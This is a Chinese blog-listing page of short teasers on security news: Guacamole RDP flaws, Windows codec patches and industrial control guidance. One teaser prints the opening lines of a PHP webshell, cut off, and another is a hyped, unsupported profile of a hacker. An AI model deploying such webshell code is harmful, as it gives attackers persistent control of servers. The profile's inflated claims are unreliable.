恢复内容开始 今天,天气挺好,瓢泼大雨。。好了,回归现实,今天在群里看到工业信息的比赛,就想着良辰美景别浪费,学习一波。 首先根据工业和信息化部关于印发《工业控制系统信息安全防护指南》的通知:http://www.miit.gov.cn/n1146285/n1146352/n3054355/n305 ...
分类:
其他好文 时间:
2020-07-04 01:40:17
阅读次数:
84
东方联盟安全组织一项新研究发现了Apache Guacamole中的多个严重反向RDP漏洞,Apache Guacamole是系统管理员用于远程访问和管理Windows和Linux计算机的流行远程桌面应用程序。 所报告的缺陷可能会使不法分子行为完全控制Guacamole服务器,拦截和控制所有其他连接 ...
分类:
Web程序 时间:
2020-07-03 12:10:49
阅读次数:
76
如果你想接触黑客防御,社会工程学和网络安全意识的相关知识,您需要了解和认识互联网一些传奇人物。 曾几何时,郭盛华是历史上最难以捉摸的计算机网络安全专家。他著名的“电子操纵杆”使他成为FBI最想要的名单之一,传闻他是唯一能影响美国科技股走势的中国互联网风云人物,他是国外黑客的“肉中刺”,同行的嫉妒恨。 ...
分类:
其他好文 时间:
2020-07-02 19:50:16
阅读次数:
61
微软昨天悄悄发布了带外软件更新,以修补两个影响数亿Windows 10和Server版本用户的高风险安全漏洞。 值得一提的是,微软赶在即将于7月14日发布的每月“补丁星期二更新”之前将近两周交付补丁。 这可能是因为这两个漏洞都存在于Windows编解码器库中,Windows编解码器库是社交工程师受害 ...
分类:
其他好文 时间:
2020-07-01 22:10:43
阅读次数:
58
前言 现代软件行业的高速发展对开发者的综合素质要求越来越高,因为不仅是编程知识点,其它维度的知识点也会影响到软件的最终交付质量。比如:数据库的表结构和索引、设计缺陷可能带来软件上的架构缺陷或性能风险、工程结构混乱导致后续维护艰难、没有鉴权的漏洞代码易被黑客攻击等等。 那这样的话,我们在项目开发的过程 ...
分类:
其他好文 时间:
2020-06-30 22:34:09
阅读次数:
58
先是shell脚本 <?php @error_reporting(0); session_start(); if (isset($_GET['pass'])) { $key=substr(md5(uniqid(rand())),16); $_SESSION['k']=$key; print $key ...
分类:
其他好文 时间:
2020-06-24 14:22:32
阅读次数:
76
